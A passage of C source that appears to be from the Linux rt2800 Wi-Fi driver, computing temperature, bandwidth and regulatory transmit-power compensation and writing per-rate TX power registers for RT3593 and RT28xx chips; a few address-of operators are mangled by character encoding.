} else {
rt2800_eeprom_read(rt2x00dev, EEPROM_TSSI_BOUND_A1, &eeprom);
tssi_bounds[0] = rt2x00_get_field16(eeprom,
EEPROM_TSSI_BOUND_A1_MINUS4);
tssi_bounds[1] = rt2x00_get_field16(eeprom,
EEPROM_TSSI_BOUND_A1_MINUS3);
rt2800_eeprom_read(rt2x00dev, EEPROM_TSSI_BOUND_A2, &eeprom);
tssi_bounds[2] = rt2x00_get_field16(eeprom,
EEPROM_TSSI_BOUND_A2_MINUS2);
tssi_bounds[3] = rt2x00_get_field16(eeprom,
EEPROM_TSSI_BOUND_A2_MINUS1);
rt2800_eeprom_read(rt2x00dev, EEPROM_TSSI_BOUND_A3, &eeprom);
tssi_bounds[4] = rt2x00_get_field16(eeprom,
EEPROM_TSSI_BOUND_A3_REF);
tssi_bounds[5] = rt2x00_get_field16(eeprom,
EEPROM_TSSI_BOUND_A3_PLUS1);
rt2800_eeprom_read(rt2x00dev, EEPROM_TSSI_BOUND_A4, &eeprom);
tssi_bounds[6] = rt2x00_get_field16(eeprom,
EEPROM_TSSI_BOUND_A4_PLUS2);
tssi_bounds[7] = rt2x00_get_field16(eeprom,
EEPROM_TSSI_BOUND_A4_PLUS3);
rt2800_eeprom_read(rt2x00dev, EEPROM_TSSI_BOUND_A5, &eeprom);
tssi_bounds[8] = rt2x00_get_field16(eeprom,
EEPROM_TSSI_BOUND_A5_PLUS4);
step = rt2x00_get_field16(eeprom,
EEPROM_TSSI_BOUND_A5_AGC_STEP);
}
/*
* Check if temperature compensation is supported.
*/
if (tssi_bounds[4] == 0xff || step == 0xff)
return 0;
/*
* Read current TSSI (BBP 49).
*/
rt2800_bbp_read(rt2x00dev, 49, ¤t_tssi);
/*
* Compare TSSI value (BBP49) with the compensation boundaries
* from the EEPROM and increase or decrease tx power.
*/
for (i = 0; i <= 3; i++) {
if (current_tssi > tssi_bounds[i])
break;
}
if (i == 4) {
for (i = 8; i >= 5; i--) {
if (current_tssi < tssi_bounds[i])
break;
}
}
return (i - 4) * step;
}
static int rt2800_get_txpower_bw_comp(struct rt2x00_dev *rt2x00dev,
enum ieee80211_band band)
{
u16 eeprom;
u8 comp_en;
u8 comp_type;
int comp_value = 0;
rt2800_eeprom_read(rt2x00dev, EEPROM_TXPOWER_DELTA, &eeprom);
/*
* HT40 compensation not required.
*/
if (eeprom == 0xffff ||
!test_bit(CONFIG_CHANNEL_HT40, &rt2x00dev->flags))
return 0;
if (band == IEEE80211_BAND_2GHZ) {
comp_en = rt2x00_get_field16(eeprom,
EEPROM_TXPOWER_DELTA_ENABLE_2G);
if (comp_en) {
comp_type = rt2x00_get_field16(eeprom,
EEPROM_TXPOWER_DELTA_TYPE_2G);
comp_value = rt2x00_get_field16(eeprom,
EEPROM_TXPOWER_DELTA_VALUE_2G);
if (!comp_type)
comp_value = -comp_value;
}
} else {
comp_en = rt2x00_get_field16(eeprom,
EEPROM_TXPOWER_DELTA_ENABLE_5G);
if (comp_en) {
comp_type = rt2x00_get_field16(eeprom,
EEPROM_TXPOWER_DELTA_TYPE_5G);
comp_value = rt2x00_get_field16(eeprom,
EEPROM_TXPOWER_DELTA_VALUE_5G);
if (!comp_type)
comp_value = -comp_value;
}
}
return comp_value;
}
static int rt2800_get_txpower_reg_delta(struct rt2x00_dev *rt2x00dev,
int power_level, int max_power)
{
int delta;
if (rt2x00_has_cap_power_limit(rt2x00dev))
return 0;
/*
* XXX: We don't know the maximum transmit power of our hardware since
* the EEPROM doesn't expose it. We only know that we are calibrated
* to 100% tx power.
*
* Hence, we assume the regulatory limit that cfg80211 calulated for
* the current channel is our maximum and if we are requested to lower
* the value we just reduce our tx power accordingly.
*/
delta = power_level - max_power;
return min(delta, 0);
}
static u8 rt2800_compensate_txpower(struct rt2x00_dev *rt2x00dev, int is_rate_b,
enum ieee80211_band band, int power_level,
u8 txpower, int delta)
{
u16 eeprom;
u8 criterion;
u8 eirp_txpower;
u8 eirp_txpower_criterion;
u8 reg_limit;
if (rt2x00_rt(rt2x00dev, RT3593))
return min_t(u8, txpower, 0xc);
if (rt2x00_has_cap_power_limit(rt2x00dev)) {
/*
* Check if eirp txpower exceed txpower_limit.
* We use OFDM 6M as criterion and its eirp txpower
* is stored at EEPROM_EIRP_MAX_TX_POWER.
* .11b data rate need add additional 4dbm
* when calculating eirp txpower.
*/
rt2800_eeprom_read_from_array(rt2x00dev, EEPROM_TXPOWER_BYRATE,
1, &eeprom);
criterion = rt2x00_get_field16(eeprom,
EEPROM_TXPOWER_BYRATE_RATE0);
rt2800_eeprom_read(rt2x00dev, EEPROM_EIRP_MAX_TX_POWER,
&eeprom);
if (band == IEEE80211_BAND_2GHZ)
eirp_txpower_criterion = rt2x00_get_field16(eeprom,
EEPROM_EIRP_MAX_TX_POWER_2GHZ);
else
eirp_txpower_criterion = rt2x00_get_field16(eeprom,
EEPROM_EIRP_MAX_TX_POWER_5GHZ);
eirp_txpower = eirp_txpower_criterion + (txpower - criterion) +
(is_rate_b ? 4 : 0) + delta;
reg_limit = (eirp_txpower > power_level) ?
(eirp_txpower - power_level) : 0;
} else
reg_limit = 0;
txpower = max(0, txpower + delta - reg_limit);
return min_t(u8, txpower, 0xc);
}
enum {
TX_PWR_CFG_0_IDX,
TX_PWR_CFG_1_IDX,
TX_PWR_CFG_2_IDX,
TX_PWR_CFG_3_IDX,
TX_PWR_CFG_4_IDX,
TX_PWR_CFG_5_IDX,
TX_PWR_CFG_6_IDX,
TX_PWR_CFG_7_IDX,
TX_PWR_CFG_8_IDX,
TX_PWR_CFG_9_IDX,
TX_PWR_CFG_0_EXT_IDX,
TX_PWR_CFG_1_EXT_IDX,
TX_PWR_CFG_2_EXT_IDX,
TX_PWR_CFG_3_EXT_IDX,
TX_PWR_CFG_4_EXT_IDX,
TX_PWR_CFG_IDX_COUNT,
};
static void rt2800_config_txpower_rt3593(struct rt2x00_dev *rt2x00dev,
struct ieee80211_channel *chan,
int power_level)
{
u8 txpower;
u16 eeprom;
u32 regs[TX_PWR_CFG_IDX_COUNT];
unsigned int offset;
enum ieee80211_band band = chan->band;
int delta;
int i;
memset(regs, '\0', sizeof(regs));
/* TODO: adapt TX power reduction from the rt28xx code */
/* calculate temperature compensation delta */
delta = rt2800_get_gain_calibration_delta(rt2x00dev);
if (band == IEEE80211_BAND_5GHZ)
offset = 16;
else
offset = 0;
if (test_bit(CONFIG_CHANNEL_HT40, &rt2x00dev->flags))
offset += 8;
/* read the next four txpower values */
rt2800_eeprom_read_from_array(rt2x00dev, EEPROM_TXPOWER_BYRATE,
offset, &eeprom);
/* CCK 1MBS,2MBS */
txpower = rt2x00_get_field16(eeprom, EEPROM_TXPOWER_BYRATE_RATE0);
txpower = rt2800_compensate_txpower(rt2x00dev, 1, band, power_level,
txpower, delta);
rt2x00_set_field32(®s[TX_PWR_CFG_0_IDX],
TX_PWR_CFG_0_CCK1_CH0, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_0_IDX],
TX_PWR_CFG_0_CCK1_CH1, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_0_EXT_IDX],
TX_PWR_CFG_0_EXT_CCK1_CH2, txpower);
/* CCK 5.5MBS,11MBS */
txpower = rt2x00_get_field16(eeprom, EEPROM_TXPOWER_BYRATE_RATE1);
txpower = rt2800_compensate_txpower(rt2x00dev, 1, band, power_level,
txpower, delta);
rt2x00_set_field32(®s[TX_PWR_CFG_0_IDX],
TX_PWR_CFG_0_CCK5_CH0, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_0_IDX],
TX_PWR_CFG_0_CCK5_CH1, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_0_EXT_IDX],
TX_PWR_CFG_0_EXT_CCK5_CH2, txpower);
/* OFDM 6MBS,9MBS */
txpower = rt2x00_get_field16(eeprom, EEPROM_TXPOWER_BYRATE_RATE2);
txpower = rt2800_compensate_txpower(rt2x00dev, 0, band, power_level,
txpower, delta);
rt2x00_set_field32(®s[TX_PWR_CFG_0_IDX],
TX_PWR_CFG_0_OFDM6_CH0, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_0_IDX],
TX_PWR_CFG_0_OFDM6_CH1, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_0_EXT_IDX],
TX_PWR_CFG_0_EXT_OFDM6_CH2, txpower);
/* OFDM 12MBS,18MBS */
txpower = rt2x00_get_field16(eeprom, EEPROM_TXPOWER_BYRATE_RATE3);
txpower = rt2800_compensate_txpower(rt2x00dev, 0, band, power_level,
txpower, delta);
rt2x00_set_field32(®s[TX_PWR_CFG_0_IDX],
TX_PWR_CFG_0_OFDM12_CH0, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_0_IDX],
TX_PWR_CFG_0_OFDM12_CH1, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_0_EXT_IDX],
TX_PWR_CFG_0_EXT_OFDM12_CH2, txpower);
/* read the next four txpower values */
rt2800_eeprom_read_from_array(rt2x00dev, EEPROM_TXPOWER_BYRATE,
offset + 1, &eeprom);
/* OFDM 24MBS,36MBS */
txpower = rt2x00_get_field16(eeprom, EEPROM_TXPOWER_BYRATE_RATE0);
txpower = rt2800_compensate_txpower(rt2x00dev, 0, band, power_level,
txpower, delta);
rt2x00_set_field32(®s[TX_PWR_CFG_1_IDX],
TX_PWR_CFG_1_OFDM24_CH0, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_1_IDX],
TX_PWR_CFG_1_OFDM24_CH1, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_1_EXT_IDX],
TX_PWR_CFG_1_EXT_OFDM24_CH2, txpower);
/* OFDM 48MBS */
txpower = rt2x00_get_field16(eeprom, EEPROM_TXPOWER_BYRATE_RATE1);
txpower = rt2800_compensate_txpower(rt2x00dev, 0, band, power_level,
txpower, delta);
rt2x00_set_field32(®s[TX_PWR_CFG_1_IDX],
TX_PWR_CFG_1_OFDM48_CH0, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_1_IDX],
TX_PWR_CFG_1_OFDM48_CH1, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_1_EXT_IDX],
TX_PWR_CFG_1_EXT_OFDM48_CH2, txpower);
/* OFDM 54MBS */
txpower = rt2x00_get_field16(eeprom, EEPROM_TXPOWER_BYRATE_RATE2);
txpower = rt2800_compensate_txpower(rt2x00dev, 0, band, power_level,
txpower, delta);
rt2x00_set_field32(®s[TX_PWR_CFG_7_IDX],
TX_PWR_CFG_7_OFDM54_CH0, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_7_IDX],
TX_PWR_CFG_7_OFDM54_CH1, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_7_IDX],
TX_PWR_CFG_7_OFDM54_CH2, txpower);
/* read the next four txpower values */
rt2800_eeprom_read_from_array(rt2x00dev, EEPROM_TXPOWER_BYRATE,
offset + 2, &eeprom);
/* MCS 0,1 */
txpower = rt2x00_get_field16(eeprom, EEPROM_TXPOWER_BYRATE_RATE0);
txpower = rt2800_compensate_txpower(rt2x00dev, 0, band, power_level,
txpower, delta);
rt2x00_set_field32(®s[TX_PWR_CFG_1_IDX],
TX_PWR_CFG_1_MCS0_CH0, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_1_IDX],
TX_PWR_CFG_1_MCS0_CH1, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_1_EXT_IDX],
TX_PWR_CFG_1_EXT_MCS0_CH2, txpower);
/* MCS 2,3 */
txpower = rt2x00_get_field16(eeprom, EEPROM_TXPOWER_BYRATE_RATE1);
txpower = rt2800_compensate_txpower(rt2x00dev, 0, band, power_level,
txpower, delta);
rt2x00_set_field32(®s[TX_PWR_CFG_1_IDX],
TX_PWR_CFG_1_MCS2_CH0, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_1_IDX],
TX_PWR_CFG_1_MCS2_CH1, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_1_EXT_IDX],
TX_PWR_CFG_1_EXT_MCS2_CH2, txpower);
/* MCS 4,5 */
txpower = rt2x00_get_field16(eeprom, EEPROM_TXPOWER_BYRATE_RATE2);
txpower = rt2800_compensate_txpower(rt2x00dev, 0, band, power_level,
txpower, delta);
rt2x00_set_field32(®s[TX_PWR_CFG_2_IDX],
TX_PWR_CFG_2_MCS4_CH0, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_2_IDX],
TX_PWR_CFG_2_MCS4_CH1, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_2_EXT_IDX],
TX_PWR_CFG_2_EXT_MCS4_CH2, txpower);
/* MCS 6 */
txpower = rt2x00_get_field16(eeprom, EEPROM_TXPOWER_BYRATE_RATE3);
txpower = rt2800_compensate_txpower(rt2x00dev, 0, band, power_level,
txpower, delta);
rt2x00_set_field32(®s[TX_PWR_CFG_2_IDX],
TX_PWR_CFG_2_MCS6_CH0, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_2_IDX],
TX_PWR_CFG_2_MCS6_CH1, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_2_EXT_IDX],
TX_PWR_CFG_2_EXT_MCS6_CH2, txpower);
/* read the next four txpower values */
rt2800_eeprom_read_from_array(rt2x00dev, EEPROM_TXPOWER_BYRATE,
offset + 3, &eeprom);
/* MCS 7 */
txpower = rt2x00_get_field16(eeprom, EEPROM_TXPOWER_BYRATE_RATE0);
txpower = rt2800_compensate_txpower(rt2x00dev, 0, band, power_level,
txpower, delta);
rt2x00_set_field32(®s[TX_PWR_CFG_7_IDX],
TX_PWR_CFG_7_MCS7_CH0, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_7_IDX],
TX_PWR_CFG_7_MCS7_CH1, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_7_IDX],
TX_PWR_CFG_7_MCS7_CH2, txpower);
/* MCS 8,9 */
txpower = rt2x00_get_field16(eeprom, EEPROM_TXPOWER_BYRATE_RATE1);
txpower = rt2800_compensate_txpower(rt2x00dev, 0, band, power_level,
txpower, delta);
rt2x00_set_field32(®s[TX_PWR_CFG_2_IDX],
TX_PWR_CFG_2_MCS8_CH0, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_2_IDX],
TX_PWR_CFG_2_MCS8_CH1, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_2_EXT_IDX],
TX_PWR_CFG_2_EXT_MCS8_CH2, txpower);
/* MCS 10,11 */
txpower = rt2x00_get_field16(eeprom, EEPROM_TXPOWER_BYRATE_RATE2);
txpower = rt2800_compensate_txpower(rt2x00dev, 0, band, power_level,
txpower, delta);
rt2x00_set_field32(®s[TX_PWR_CFG_2_IDX],
TX_PWR_CFG_2_MCS10_CH0, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_2_IDX],
TX_PWR_CFG_2_MCS10_CH1, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_2_EXT_IDX],
TX_PWR_CFG_2_EXT_MCS10_CH2, txpower);
/* MCS 12,13 */
txpower = rt2x00_get_field16(eeprom, EEPROM_TXPOWER_BYRATE_RATE3);
txpower = rt2800_compensate_txpower(rt2x00dev, 0, band, power_level,
txpower, delta);
rt2x00_set_field32(®s[TX_PWR_CFG_3_IDX],
TX_PWR_CFG_3_MCS12_CH0, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_3_IDX],
TX_PWR_CFG_3_MCS12_CH1, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_3_EXT_IDX],
TX_PWR_CFG_3_EXT_MCS12_CH2, txpower);
/* read the next four txpower values */
rt2800_eeprom_read_from_array(rt2x00dev, EEPROM_TXPOWER_BYRATE,
offset + 4, &eeprom);
/* MCS 14 */
txpower = rt2x00_get_field16(eeprom, EEPROM_TXPOWER_BYRATE_RATE0);
txpower = rt2800_compensate_txpower(rt2x00dev, 0, band, power_level,
txpower, delta);
rt2x00_set_field32(®s[TX_PWR_CFG_3_IDX],
TX_PWR_CFG_3_MCS14_CH0, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_3_IDX],
TX_PWR_CFG_3_MCS14_CH1, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_3_EXT_IDX],
TX_PWR_CFG_3_EXT_MCS14_CH2, txpower);
/* MCS 15 */
txpower = rt2x00_get_field16(eeprom, EEPROM_TXPOWER_BYRATE_RATE1);
txpower = rt2800_compensate_txpower(rt2x00dev, 0, band, power_level,
txpower, delta);
rt2x00_set_field32(®s[TX_PWR_CFG_8_IDX],
TX_PWR_CFG_8_MCS15_CH0, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_8_IDX],
TX_PWR_CFG_8_MCS15_CH1, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_8_IDX],
TX_PWR_CFG_8_MCS15_CH2, txpower);
/* MCS 16,17 */
txpower = rt2x00_get_field16(eeprom, EEPROM_TXPOWER_BYRATE_RATE2);
txpower = rt2800_compensate_txpower(rt2x00dev, 0, band, power_level,
txpower, delta);
rt2x00_set_field32(®s[TX_PWR_CFG_5_IDX],
TX_PWR_CFG_5_MCS16_CH0, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_5_IDX],
TX_PWR_CFG_5_MCS16_CH1, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_5_IDX],
TX_PWR_CFG_5_MCS16_CH2, txpower);
/* MCS 18,19 */
txpower = rt2x00_get_field16(eeprom, EEPROM_TXPOWER_BYRATE_RATE3);
txpower = rt2800_compensate_txpower(rt2x00dev, 0, band, power_level,
txpower, delta);
rt2x00_set_field32(®s[TX_PWR_CFG_5_IDX],
TX_PWR_CFG_5_MCS18_CH0, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_5_IDX],
TX_PWR_CFG_5_MCS18_CH1, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_5_IDX],
TX_PWR_CFG_5_MCS18_CH2, txpower);
/* read the next four txpower values */
rt2800_eeprom_read_from_array(rt2x00dev, EEPROM_TXPOWER_BYRATE,
offset + 5, &eeprom);
/* MCS 20,21 */
txpower = rt2x00_get_field16(eeprom, EEPROM_TXPOWER_BYRATE_RATE0);
txpower = rt2800_compensate_txpower(rt2x00dev, 0, band, power_level,
txpower, delta);
rt2x00_set_field32(®s[TX_PWR_CFG_6_IDX],
TX_PWR_CFG_6_MCS20_CH0, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_6_IDX],
TX_PWR_CFG_6_MCS20_CH1, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_6_IDX],
TX_PWR_CFG_6_MCS20_CH2, txpower);
/* MCS 22 */
txpower = rt2x00_get_field16(eeprom, EEPROM_TXPOWER_BYRATE_RATE1);
txpower = rt2800_compensate_txpower(rt2x00dev, 0, band, power_level,
txpower, delta);
rt2x00_set_field32(®s[TX_PWR_CFG_6_IDX],
TX_PWR_CFG_6_MCS22_CH0, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_6_IDX],
TX_PWR_CFG_6_MCS22_CH1, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_6_IDX],
TX_PWR_CFG_6_MCS22_CH2, txpower);
/* MCS 23 */
txpower = rt2x00_get_field16(eeprom, EEPROM_TXPOWER_BYRATE_RATE2);
txpower = rt2800_compensate_txpower(rt2x00dev, 0, band, power_level,
txpower, delta);
rt2x00_set_field32(®s[TX_PWR_CFG_8_IDX],
TX_PWR_CFG_8_MCS23_CH0, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_8_IDX],
TX_PWR_CFG_8_MCS23_CH1, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_8_IDX],
TX_PWR_CFG_8_MCS23_CH2, txpower);
/* read the next four txpower values */
rt2800_eeprom_read_from_array(rt2x00dev, EEPROM_TXPOWER_BYRATE,
offset + 6, &eeprom);
/* STBC, MCS 0,1 */
txpower = rt2x00_get_field16(eeprom, EEPROM_TXPOWER_BYRATE_RATE0);
txpower = rt2800_compensate_txpower(rt2x00dev, 0, band, power_level,
txpower, delta);
rt2x00_set_field32(®s[TX_PWR_CFG_3_IDX],
TX_PWR_CFG_3_STBC0_CH0, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_3_IDX],
TX_PWR_CFG_3_STBC0_CH1, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_3_EXT_IDX],
TX_PWR_CFG_3_EXT_STBC0_CH2, txpower);
/* STBC, MCS 2,3 */
txpower = rt2x00_get_field16(eeprom, EEPROM_TXPOWER_BYRATE_RATE1);
txpower = rt2800_compensate_txpower(rt2x00dev, 0, band, power_level,
txpower, delta);
rt2x00_set_field32(®s[TX_PWR_CFG_3_IDX],
TX_PWR_CFG_3_STBC2_CH0, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_3_IDX],
TX_PWR_CFG_3_STBC2_CH1, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_3_EXT_IDX],
TX_PWR_CFG_3_EXT_STBC2_CH2, txpower);
/* STBC, MCS 4,5 */
txpower = rt2x00_get_field16(eeprom, EEPROM_TXPOWER_BYRATE_RATE2);
txpower = rt2800_compensate_txpower(rt2x00dev, 0, band, power_level,
txpower, delta);
rt2x00_set_field32(®s[TX_PWR_CFG_4_IDX], TX_PWR_CFG_RATE0, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_4_IDX], TX_PWR_CFG_RATE1, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_4_EXT_IDX], TX_PWR_CFG_RATE0,
txpower);
/* STBC, MCS 6 */
txpower = rt2x00_get_field16(eeprom, EEPROM_TXPOWER_BYRATE_RATE3);
txpower = rt2800_compensate_txpower(rt2x00dev, 0, band, power_level,
txpower, delta);
rt2x00_set_field32(®s[TX_PWR_CFG_4_IDX], TX_PWR_CFG_RATE2, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_4_IDX], TX_PWR_CFG_RATE3, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_4_EXT_IDX], TX_PWR_CFG_RATE2,
txpower);
/* read the next four txpower values */
rt2800_eeprom_read_from_array(rt2x00dev, EEPROM_TXPOWER_BYRATE,
offset + 7, &eeprom);
/* STBC, MCS 7 */
txpower = rt2x00_get_field16(eeprom, EEPROM_TXPOWER_BYRATE_RATE0);
txpower = rt2800_compensate_txpower(rt2x00dev, 0, band, power_level,
txpower, delta);
rt2x00_set_field32(®s[TX_PWR_CFG_9_IDX],
TX_PWR_CFG_9_STBC7_CH0, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_9_IDX],
TX_PWR_CFG_9_STBC7_CH1, txpower);
rt2x00_set_field32(®s[TX_PWR_CFG_9_IDX],
TX_PWR_CFG_9_STBC7_CH2, txpower);
rt2800_register_write(rt2x00dev, TX_PWR_CFG_0, regs[TX_PWR_CFG_0_IDX]);
rt2800_register_write(rt2x00dev, TX_PWR_CFG_1, regs[TX_PWR_CFG_1_IDX]);
rt2800_register_write(rt2x00dev, TX_PWR_CFG_2, regs[TX_PWR_CFG_2_IDX]);
rt2800_register_write(rt2x00dev, TX_PWR_CFG_3, regs[TX_PWR_CFG_3_IDX]);
rt2800_register_write(rt2x00dev, TX_PWR_CFG_4, regs[TX_PWR_CFG_4_IDX]);
rt2800_register_write(rt2x00dev, TX_PWR_CFG_5, regs[TX_PWR_CFG_5_IDX]);
rt2800_register_write(rt2x00dev, TX_PWR_CFG_6, regs[TX_PWR_CFG_6_IDX]);
rt2800_register_write(rt2x00dev, TX_PWR_CFG_7, regs[TX_PWR_CFG_7_IDX]);
rt2800_register_write(rt2x00dev, TX_PWR_CFG_8, regs[TX_PWR_CFG_8_IDX]);
rt2800_register_write(rt2x00dev, TX_PWR_CFG_9, regs[TX_PWR_CFG_9_IDX]);
rt2800_register_write(rt2x00dev, TX_PWR_CFG_0_EXT,
regs[TX_PWR_CFG_0_EXT_IDX]);
rt2800_register_write(rt2x00dev, TX_PWR_CFG_1_EXT,
regs[TX_PWR_CFG_1_EXT_IDX]);
rt2800_register_write(rt2x00dev, TX_PWR_CFG_2_EXT,
regs[TX_PWR_CFG_2_EXT_IDX]);
rt2800_register_write(rt2x00dev, TX_PWR_CFG_3_EXT,
regs[TX_PWR_CFG_3_EXT_IDX]);
rt2800_register_write(rt2x00dev, TX_PWR_CFG_4_EXT,
regs[TX_PWR_CFG_4_EXT_IDX]);
for (i = 0; i < TX_PWR_CFG_IDX_COUNT; i++)
rt2x00_dbg(rt2x00dev,
"band:%cGHz, BW:%c0MHz, TX_PWR_CFG_%d%s = %08lx\n",
(band == IEEE80211_BAND_5GHZ) ? '5' : '2',
(test_bit(CONFIG_CHANNEL_HT40, &rt2x00dev->flags)) ?
'4' : '2',
(i > TX_PWR_CFG_9_IDX) ?
(i - TX_PWR_CFG_9_IDX - 1) : i,
(i > TX_PWR_CFG_9_IDX) ? "_EXT" : "",
(unsigned long) regs[i]);
}
/*
* We configure transmit power using MAC TX_PWR_CFG_{0,...,N} registers and
* BBP R1 register. TX_PWR_CFG_X allow to configure per rate TX power values,
* 4 bits for each rate (tune from 0 to 15 dBm). BBP_R1 controls transmit power
* for all rates, but allow to set only 4 discrete values: -12, -6, 0 and 6 dBm.
* Reference per rate transmit power values are located in the EEPROM at
* EEPROM_TXPOWER_BYRATE offset. We adjust them and BBP R1 settings according to
* current conditions (i.e. band, bandwidth, temperature, user settings).
*/
static void rt2800_config_txpower_rt28xx(struct rt2x00_dev *rt2x00dev,
struct ieee80211_channel *chan,
int power_level)
{
u8 txpower, r1;
u16 eeprom;
u32 reg, offset;
int i, is_rate_b, delta, power_ctrl;
enum ieee80211_band band = chan->band;
/*
* Calculate HT40 compensation. For 40MHz we need to add or subtract
* value read from EEPROM (different for 2GHz and for 5GHz).
*/
delta = rt2800_get_txpower_bw_comp(rt2x00dev, band);
/*
* Calculate temperature compensation. Depends on measurement of current
* TSSI (Transmitter Signal Strength Indication) we know TX power (due
* to temperature or maybe other factors) is smaller or bigger than
* expected. We adjust it, based on TSSI reference and boundaries values
* provided in EEPROM.
*/
switch (rt2x00dev->chip.rt) {
case RT2860:
case RT2872:
case RT2883:
case RT3070:
case RT3071:
case RT3090:
case RT3572:
delta += rt2800_get_gain_calibration_delta(rt2x00dev);
break;
default:
/* TODO: temperature compensation code for other chips. */
break;
}
/*
* Decrease power according to user settings, on devices with unknown
* maximum tx power. For other devices we take user power_level into
* consideration on rt2800_compensate_txpower().
*/
delta += rt2800_get_txpower_reg_delta(rt2x00dev, power_level,
chan->max_power);
/*
* BBP_R1 controls TX power for all rates, it allow to set the following
* gains -12, -6, 0, +6 dBm by setting values 2, 1, 0, 3 respectively.
*
* TODO: we do not use +6 dBm option to do not increase power beyond
* regulatory limit, however this could be utilized for devices with
* CAPABILITY_POWER_LIMIT.
*/
if (delta <= -12) {
power_ctrl = 2;
delta += 12;
} else if (delta <= -6) {
power_ctrl = 1;
delta += 6;
} else {
power_ctrl = 0;
}
rt2800_bbp_read(rt2x00dev, 1, &r1);
rt2x00_set_field8(&r1, BBP1_TX_POWER_CTRL, power_ctrl);
rt2800_bbp_write(rt2x00dev, 1, r1);
offset = TX_PWR_CFG_0;
for (i = 0; i < EEPROM_TXPOWER_BYRATE_SIZE; i += 2) {
/* just to be safe */
if (offset > TX_PWR_CFG_4)
break;
rt2800_register_read(rt2x00dev, offset, ®);
/* read the next four txpower values */
rt2800_eeprom_read_from_array(rt2x00dev, EEPROM_TXPOWER_BYRATE,
i, &eeprom);
is_rate_b = i ? 0 : 1;
/*
* TX_PWR_CFG_0: 1MBS, TX_PWR_CFG_1: 24MBS,
* TX_PWR_CFG_2: MCS4, TX_PWR_CFG_3: MCS12,
* TX_PWR_CFG_4: unknown
*/
txpower = rt2x00_get_field16(eeprom,
EEPROM_TXPOWER_BYRATE_RATE0);
txpower = rt2800_compensate_txpower(rt2x00dev, is_rate_b, band,
power_level, txpower, delta);
rt2x00_set_field32(®, TX_PWR_CFG_RATE0, txpower);
/*
* TX_PWR_CFG_0: 2MBS, TX_PWR_CFG_1: 36MBS,
* TX_PWR_CFG_2: MCS5, TX_PWR_CFG_3: MCS13,
* TX_PWR_CFG_4: unknown
*/
txpower = rt2x00_get_field16(eeprom,
EEPROM_TXPOWER_BYRATE_RATE1);
txpower = rt2800_compensate_txpower(rt2x00dev, is_rate_b, band,
power_level, txpower, delta);
rt2x00_set_field32(®, TX_PWR_CFG_RATE1, txpower);
/*
* TX_PWR_CFG_0: 5.5MBS, TX_PWR_CFG_1: 48MBS,
* TX_PWR_CFG_2: MCS6, TX_PWR_CFG_3: MCS14,
* TX_PWR_CFG_4: unknown
*/
txpower = rt2x00_get_field16(eeprom,
EEPROM_TXPOWER_BYRATE_RATE2);
txpower = rt2800_compensate_txpower(rt2x00dev, is_rate_b, band,
power_level, txpower, delta);
rt2x00_set_field32(®, TX_PWR_CFG_RATE2, txpower);
/*
* TX_PWR_CFG_0: 11MBS, TX_PWR_CFG_1: 54MBS,
* TX_PWR_CFG_2: MCS7, TX_PWR_CFG_3: MCS15,
* TX_PWR_CFG_4: unknown
*/
txpower = rt2x00_get_field16(eeprom,
EEPROM_TXPOWER_BYRATE_RATE3);
txpower = rt2800_compensate_txpower(rt2x00dev, is_rate_b, band,
power_level, txpower, delta);
rt2x00_set_field32(®, TX_PWR_CFG_RATE3, txpower);
/* read the next four txpower values */
rt2800_eeprom_read_from_array(rt2x00dev, EEPROM_TXPOWER_BYRATE,
i + 1, &eeprom);
is_rate_b = 0;
/*
* TX_PWR_CFG_0: 6MBS, TX_PWR_CFG_1: MCS0,
* TX_PWR_CFG_2: MCS8, TX_PWR_CFG_3: unknown,
* TX_PWR_CFG_4: unknown
*/
txpower = rt2x00_get_field16(eeprom,
EEPROM_TXPOWER_BYRATE_RATE0);
